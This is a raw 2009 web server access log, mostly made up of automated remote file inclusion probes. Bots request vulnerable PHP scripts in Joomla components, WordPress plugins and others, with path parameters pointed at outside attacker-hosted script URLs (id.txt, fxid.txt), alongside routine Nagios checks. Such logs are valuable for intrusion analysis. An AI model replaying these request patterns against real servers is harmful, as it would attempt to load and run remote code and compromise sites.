124.217.216.86 - - [31/May/2009:05:07:54 -0400] "GET /logs/access_log.Q109051700/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:05:08:40 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:05:09:08 -0400] "GET /logs/access_log.Q109051700/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:09:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [31/May/2009:05:12:09 -0400] "GET /logs/access_log.Q109051700//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
110.45.145.92 - - [31/May/2009:05:12:10 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
110.45.145.92 - - [31/May/2009:05:12:10 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
203.194.204.129 - - [31/May/2009:05:13:20 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:13:20 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:13:20 -0400] "GET /logs/access_log.Q109052100%20%20//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:14:39 -0400] "GET /logs//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:14:39 -0400] "GET //newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:14:39 -0400] "GET /logs/access_log.Q109051100//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.226.131.208 - - [31/May/2009:05:14:42 -0400] "GET /com_remositoryhttp://www.gp.tu-berlin.de/Biopsychologie/_bio/old/id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
62.146.68.61 - - [31/May/2009:05:14:42 -0400] "GET //newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:14:42 -0400] "GET /logs//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:14:42 -0400] "GET /logs/access_log.Q109051100//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:14:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [31/May/2009:05:14:54 -0400] "GET /logs/access_log.Q109052100//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:14:55 -0400] "GET /logs/access_log.Q109052100//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:15:14 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:15:14 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:15:14 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:15:32 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:15:32 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:15:32 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:05:16:38 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:05:16:38 -0400] "GET /logs/access_log.Q109052100//components/com_smf/smf.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:05:16:38 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:41 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:41 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:41 -0400] "GET /logs/access_log.Q109052300%20%20/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:41 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:41 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:41 -0400] "GET /logs/access_log.Q109052300%20%20/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:46 -0400] "GET /logs/access_log.Q109051100%20%20/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:16:47 -0400] "GET /logs/access_log.Q109051100%20%20/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:17:25 -0400] "GET /logs/access_log.Q109051100%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:17:26 -0400] "GET /logs/access_log.Q109051100%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:05:17:28 -0400] "GET /logs/access_log.Q109051700/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:17:30 -0400] "GET /logs/access_log.Q109052100%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:17:35 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:05:17:36 -0400] "GET /logs/access_log.Q109052100%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:17:47 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:17:51 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:18:14 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:18:58 -0400] "GET /logs/access_log.Q109051100/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:19:05 -0400] "GET /logs/access_log.Q109051100/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.145.92 - - [31/May/2009:05:19:46 -0400] "GET /logs/access_log.Q109052200//com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
110.45.145.92 - - [31/May/2009:05:19:47 -0400] "GET //com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.145.92 - - [31/May/2009:05:19:47 -0400] "GET /logs//com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:05:19:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.147.72.145 - - [31/May/2009:05:21:09 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:05:22:10 -0400] "GET /logs/access_log.Q109052100%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.145.92 - - [31/May/2009:05:22:14 -0400] "GET /logs/access_log.Q109050900//com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
110.45.145.92 - - [31/May/2009:05:23:26 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:05:24:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:05:26:22 -0400] "GET /logs/access_log.Q109052300/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:05:26:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446E218300A0DD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.223.3.98 - - [31/May/2009:05:28:19 -0400] "GET /logs/access_log.Q109050700%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:28:19 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:28:19 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:28:28 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
110.45.145.92 - - [31/May/2009:05:29:24 -0400] "GET /logs/access_log.Q109051800//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:05:29:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.194.204.129 - - [31/May/2009:05:30:31 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:31 -0400] "GET /logs/access_log.Q109010700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:31 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:31 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:40 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:40 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:40 -0400] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:40 -0400] "GET /logs/access_log.Q109010700%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:56 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:56 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:30:56 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:05:31:00 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:31:57 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:31:57 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:31:57 -0400] "GET /logs/access_log.Q109050700%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:32:02 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:34:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [31/May/2009:05:36:18 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:05:36:35 -0400] "GET /logs/access_log.Q109051500/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:05:36:38 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.226.131.208 - - [31/May/2009:05:37:18 -0400] "GET /com_remositoryhttp://www.gp.tu-berlin.de/Biopsychologie/_bio/old/id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
89.223.3.98 - - [31/May/2009:05:38:50 -0400] "GET /logs/access_log.Q109051600/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:38:51 -0400] "GET /logs/access_log.Q109050700/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:05:38:57 -0400] "GET /logs/access_log.Q109050700//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:05:38:58 -0400] "GET //components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:05:38:58 -0400] "GET /logs//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
63.147.72.145 - - [31/May/2009:05:39:32 -0400] "GET //include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:05:39:32 -0400] "GET /logs//include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:05:39:45 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:39:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.18.233.198 - - [31/May/2009:05:39:59 -0400] "GET /logs/access_log.Q109052200//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:05:44:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.18.233.198 - - [31/May/2009:05:44:52 -0400] "GET /logs/access_log.Q109050700//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:05:44:53 -0400] "GET //components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:05:44:53 -0400] "GET /logs//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:05:46:10 -0400] "GET /logs/access_log.Q109052200//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
89.234.63.110 - - [31/May/2009:05:47:58 -0400] "GET /write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:47:58 -0400] "GET /logs/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:47:58 -0400] "GET /logs/access_log.Q109051800/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:47:58 -0400] "GET /logs/access_log.Q108112300/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /logs/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /logs/access_log.Q109051800/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /logs/access_log.Q108112300/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /logs/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /logs/access_log.Q109051800%20%20/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:02 -0400] "GET /logs/access_log.Q108112300%20%20/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:09 -0400] "GET /logs/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:09 -0400] "GET /logs/access_log.Q109051800%20%20/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:09 -0400] "GET /write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:05:48:09 -0400] "GET /logs/access_log.Q108112300%20%20/write.php?dir=http://primkray.ru/clx/copyright? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:48:25 -0400] "GET /logs/access_log.Q109051600/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:05:48:34 -0400] "GET /logs/access_log.Q109050700/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:49:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [31/May/2009:05:50:39 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:05:50:39 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:05:50:39 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
124.217.216.86 - - [31/May/2009:05:52:21 -0400] "GET /logs/error_log.Q109050800/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
124.217.216.86 - - [31/May/2009:05:52:22 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.826"
124.217.216.86 - - [31/May/2009:05:52:22 -0400] "GET /logs/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 200 3562 "-" "libwww-perl/5.826"
124.217.216.86 - - [31/May/2009:05:54:04 -0400] "GET /logs/access_log.Q108081500/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
110.45.145.92 - - [31/May/2009:05:55:34 -0400] "GET //com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
88.40.90.61 - - [31/May/2009:05:56:18 -0400] "GET //ashnews.php?pathtoashnews=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
88.40.90.61 - - [31/May/2009:05:56:19 -0400] "GET /logs//ashnews.php?pathtoashnews=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.208.111.178 - - [31/May/2009:05:56:34 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:05:56:34 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:05:56:34 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:05:56:35 -0400] "GET /logs/error_log.Q108061300//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:56:35 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
